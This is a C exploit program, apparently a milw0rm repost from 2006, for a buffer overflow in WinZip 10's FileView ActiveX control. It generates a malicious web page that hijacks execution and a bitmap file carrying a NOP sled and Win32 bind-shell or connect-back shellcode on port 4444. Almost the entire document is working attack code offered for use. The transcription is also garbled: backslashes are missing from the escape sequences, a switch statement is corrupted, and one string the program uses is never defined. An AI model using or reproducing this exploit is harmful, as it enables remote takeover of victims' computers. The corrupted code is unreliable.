WinZip 10.0.7245 FileView ActiveX buffer overflow Expl

[zbeng]

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <unistd.h>

#include <getopt.h>

#define NOPSIZE 999999

struct target {

char* name;

int retaddr;

};

struct shellcode {

char* name;

short port;

int host;

char* shellcode;

};

int targetno = 1;

struct target targets[] = {

{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}

/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */

};

int shellno = 2;

struct shellcode shellcodes[] = {

{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,

"x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5"

"x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9"

"xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b"

"x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b"

"x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5"

"x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03"

"x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26"

"x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6"

"x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26"

"x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03"

"xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a"

"x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f"

"x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77"

"x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f"

"x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74"

"x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0"

"xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8"

"x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73"

"xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41"

"xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d"

"xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d"

"x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70"

"xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22"

"x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43"

"x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"},

{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,

"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"

"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"

"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"

"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"

"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"

"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"

"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"

"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"

"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"

"xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"

"x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9"

"xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"

"x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"

"xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"

"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"

"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"

"x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"

"xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}

};

char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn"

"<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ"

"FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa"

"ttern = ""; /* smash the stack here */

char html2[]=""rnend subrn</SCRIPT>rnrn<OBJECT ID="WZFILEV"

"IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A"

"E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r"

"n</BODY>rn</HTML>rn";

char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00"

"x00x28x00x00x00xe7x03x00x00xe7x03x00x00"

"x01x00x18x00x00x00x00x00x08xbbx2dx00x00"

"x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x00x00";

int ret;

void help(char* progname){

int count;

printf("[ Usage instructions.n[n");

printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname);

printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n");

printf("[ --shellport|-p (port)n");

printf("[ --shellhost|-i (ip)n");

printf("[ --target|-t <target#/0xretaddr>n[n");

printf("[ Target#'sn");

for(count = 0;count <= targetno - 1;count++){

printf("[ %d %s 0x%xn",count,targets[count],targets[count]);

}

printf("[n[ Shellcode#'sn");

for(count = 0;count <= shellno - 1;count++){

printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));

}

exit(0);

}

void setret(char* retarg){

int value = atoi(retarg);

switch(value){

case 0:

printf("[ Using target '%s'n",targets[ret].name);

ret = targets[ret].retaddr;

break;

default:

ret = strtoul(retarg,NULL,16);

printf("[ Using return address '0x%x'n",ret);

break;

}

}

int main(int argc, char* argv[]){

unsigned long i, fd;

int c, index, payg, paya, lhost;

short shellport, shellport2;

int ishell = 0, itarg = 0;

char *buffer, *file, *img, *payload;

static struct option options[] = {

{"filename", 1, 0, 'f'},

{"imgname", 1, 0, 'i'},

{"target", 1, 0, 't'},

{"shellcode", 1, 0, 's'},

{"shellport", 1, 0, 'p'},

{"shellhost", 1, 0, 'd'},

{"help", 0, 0,'h'}

};

printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn");

while(c != -1){

c = getopt_long(argc,argv,"f:i:t:s:p:D:h",options,&index);

switch©{

case 'f':

file = optarg;

break;

case 'i':

img = optarg;

break;

case 't':

itarg = 1;

setret(optarg);

if(strlen((char*)&ret) < 4){

fprintf(stderr,"[ Selected target contains a null address!n");

exit(-1);

}

break;

case 's':

if(ishell==0){

payg = atoi(optarg);

switch(payg){

case 0:

printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));

payload = malloc(strlen(shellcodes[payg].shellcode)+1);

memset(payload,0,strlen(shellcodes[payg].shellcode)+1);

memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));

shellport2 = 4444;

ishell = 1;

break;

case 1:

printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));

payload = malloc(strlen(shellcodes[payg].shellcode)+1);

memset(payload,0,strlen(shellcodes[payg].shellcode)+1);

memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));

shellport2 = 4444;

ishell = 1;

break;

default:

printf("[ Invalid shellcode selection %dn",payg);

exit(0);

break;

}

}

break;

case 'p':

if(ishell==1){

if(shellcodes[payg].port > -1){

paya = strlen(payload);

shellport = atoi(optarg);

shellport2 = shellport;

shellport =(shellport&0xff)<<8 | shellport>>8;

memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));

if(paya > strlen(payload)) {

printf("[ Error shellcode port introduces null bytesn");

exit(1);

}

printf("[ Shellcode port changed to '%u'n",atoi(optarg));

}

else{

printf("[ (%s) port selection is ignored for current shellcoden",optarg);

}

}

else{

printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg);

}

break;

case 'd':

if(ishell==1){

if(shellcodes[payg].host > -1){

paya = strlen(payload);

lhost = inet_addr(optarg);

memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));

if(paya > strlen(payload)){

printf("[ Error shellhost introduces null bytesn");

exit(1);

}

printf("[ Shellhost has been changed to '%s'n",optarg);

}

else{

printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg);

}

}

else {

printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg);

}

break;

case 'h':

help(argv[0]);

break;

default:

break;

}

}

if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){

printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]);

exit(0);

}

// create image

printf("[ Creating image containing shellcode '%s'n",img);

fd = open(img,O_RDWR|O_CREAT,S_IRWXU);

if(fd == -1){

fprintf(stderr,"[ Error creating %sn",file);

exit(-1);

}

write(fd,bmphdr,sizeof(bmphdr));

for(i = 0;i < NOPSIZE;i++){

write(fd,"x90",1);

}

write(fd,payload,strlen(payload));

close(fd);

// create html

printf("[ Creating html exploit page '%s'n",file);

fd = open(file,O_RDWR|O_CREAT,S_IRWXU);

if(fd == -1){

fprintf(stderr,"[ Error creating %sn",file);

exit(-1);

}

write(fd,html1,strlen(html1));

for(i = 0;i < 265;i++){

write(fd,"A",1);

}

write(fd,&ret,4);

for(i = 0;i < 1827;i++){

write(fd,"A",1);

}

write(fd,html2,strlen(html2));

write(fd,img,strlen(img));

write(fd,html3,strlen(html3));

close(fd);

}

// milw0rm.com [2006-11-15]